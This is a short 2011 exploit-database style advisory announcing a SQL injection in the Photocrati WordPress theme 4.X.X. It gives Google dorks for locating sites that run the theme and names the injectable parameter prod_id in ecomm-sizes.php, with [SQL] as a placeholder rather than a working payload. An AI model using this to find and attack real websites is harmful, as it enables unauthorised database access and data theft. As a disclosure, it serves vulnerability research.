26 lines
No EOL
816 B
Text
26 lines
No EOL
816 B
Text
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
|
|
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
|
|
# Date: [23 / 09 / 2011 ]
|
|
# Exploit Author: [ ayastar ]
|
|
# Email : dmx-ayastar@hotmail.fr
|
|
# Software Link: [ http://www.photocrati.com ]
|
|
# Version: [4.X.X]
|
|
# Tested on: [ windows 7 ]
|
|
|
|
|
|
--------
|
|
details |
|
|
=======================================================
|
|
Software : photocrati
|
|
version : 4.X.X
|
|
Risk : High
|
|
remote : yes
|
|
|
|
attacker can do a remote injection in site URL to get some sensitive information .
|
|
almost all version are infected by this vunl.
|
|
=======================================================
|
|
Exploit code :
|
|
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
|
|
|
|
greetz to all muslims and all tryag member's
|
|
:) from morocco |